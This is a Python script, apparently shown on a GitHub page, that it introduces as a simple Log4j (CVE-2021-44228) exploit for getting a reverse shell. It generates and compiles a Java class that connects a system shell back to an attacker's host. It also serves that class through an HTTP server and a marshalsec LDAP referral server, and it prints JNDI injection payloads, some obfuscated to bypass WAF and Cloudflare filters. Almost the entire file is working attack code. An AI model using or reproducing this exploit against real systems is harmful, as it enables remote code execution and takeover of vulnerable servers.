/
CVE-2021-44228-exploit.py
176 lines (146 loc) · 6.12 KB
/
CVE-2021-44228-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
import argparse
import subprocess
import threading
import os, sys
from pathlib import Path
from http.server import HTTPServer, SimpleHTTPRequestHandler
os.system("")
current_path=os.getcwd()
# Creates HTTP directory to store and serve java payload
HTTP_Path=os.path.join(os.getcwd(),"HTTP")
if not os.path.exists(HTTP_Path) or not os.path.isdir(HTTP_Path):
os.mkdir(HTTP_Path)
class bcolors:
HEADER = '\033[95m';OKBLUE = '\033[94m'
OKGREEN = '\033[92m';WARNING = '\033[93m'
FAIL = '\033[91m';ENDC = '\033[0m'
BOLD = '\033[1m';UNDERLINE = '\033[4m'
def generate_payload(userip: str, lport: int, bypass:str):
program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String cmd;
String OS = System.getProperty("os.name").toUpperCase();
if (OS.contains("LINUX")) {
OS = "LINUX";
cmd = "/bin/sh";
} else {
OS = "WINDOWS";
cmd = "cmd.exe";
}
String host="%s";
int port=%d;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
# writing the exploit to Exploit.java file
p = Path(HTTP_Path,"Exploit.java")
try:
p.write_text(program)
subprocess.run(["javac",str(p)])
except OSError as e:
print('{0}[-] Something went wrong {1}{2}'.format(bcolors.FAIL,e,bcolors.ENDC))
raise e
else:
print('{0}[+] Exploit java class created success{1}'.format(bcolors.OKGREEN,bcolors.ENDC))
def payload(userip: str, webport: int, lport: int, bypass:str):
generate_payload(userip, lport, bypass)
print('{0}[+] Setting up LDAP server\n{1}'.format(bcolors.OKGREEN,bcolors.ENDC))
# create the LDAP server on new thread
t1 = threading.Thread(target=ldap_server, args=(userip, webport, bypass))
t1.start()
# start the web server
os.chdir(HTTP_Path)
print("{0}[+] Starting Webserver on port {1} http://0.0.0.0:{1}{2}".format(bcolors.OKGREEN,webport,bcolors.ENDC))
httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
httpd.serve_forever()
def check_java() -> bool:
exit_code = subprocess.call(['java','-version',
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
return exit_code == 0
def ldap_server(userip: str, lport: int,bypass: str):
sendme = "${jndi:ldap://%s:1389/a}" % (userip)
if bypass.upper() == "WAF":
sendme += "\n[!] !WAF Payload!"
sendme += "\n[+] Try me: ${jndi:ldap://%s:1389/ a}" % (userip)
sendme += "\n[+] Try me: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://%s:1389/ a}" % (userip)
sendme += "\n[+] Try me: ${${::-j}ndi:rmi://%s:1389/ a}" % (userip)
sendme += "\n[+] Try me: ${jndi:rmi://%s:1389/ a}" % (userip)
if bypass.capitalize() == "Methods":
sendme += "\n[!] !Methods Payload!"
sendme += "\n[+] Try me: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//%s:1389/ a}" % (userip)
if bypass.capitalize() == "Cloudflare":
sendme += "\n[!] !Cloudflare Payload!"
sendme += "\n[+] Try me: ${jndi:${lower:l}${lower:d}a${lower:p}://%s:1389/ a}" % (userip)
print("{0}\n[+] Send me: {1}\n{2}".format(bcolors.OKGREEN,sendme,bcolors.ENDC))
url = "http://{0}:{1}/#Exploit".format(userip, lport)
subprocess.run(["java","-cp",os.path.join(current_path, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),"marshalsec.jndi.LDAPRefServer",
url,
])
def main():
print( """{0}
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html{1}
""".format(bcolors.OKBLUE,bcolors.ENDC))
parser = argparse.ArgumentParser(description='log4shell Reverse shell exploit')
parser.add_argument('--userip',
metavar='userip',
type=str,
default='localhost',
help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport',
metavar='webport',
type=int,
default='8000',
help='listener port for HTTP port')
parser.add_argument('--lport',
metavar='lport',
type=int,
default='9001',
help='Netcat Port')
parser.add_argument('-b',"--bypass",
metavar='bypass',
type=str,
default='None',
help='Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the ${lower:x} method restriction bypass')
args = parser.parse_args()
try:
if not check_java():
print('{0}[-] Java is not installed inside the repository{1}'.format(bcolors.FAIL,bcolors.ENDC))
sys.exit(1)
payload(args.userip, args.webport, args.lport, args.bypass)
except KeyboardInterrupt:
print( "{0}user interupted the program.{1}".format(bcolors.FAIL,bcolors.ENDC))
sys.exit(1)
if __name__ == "__main__":
main()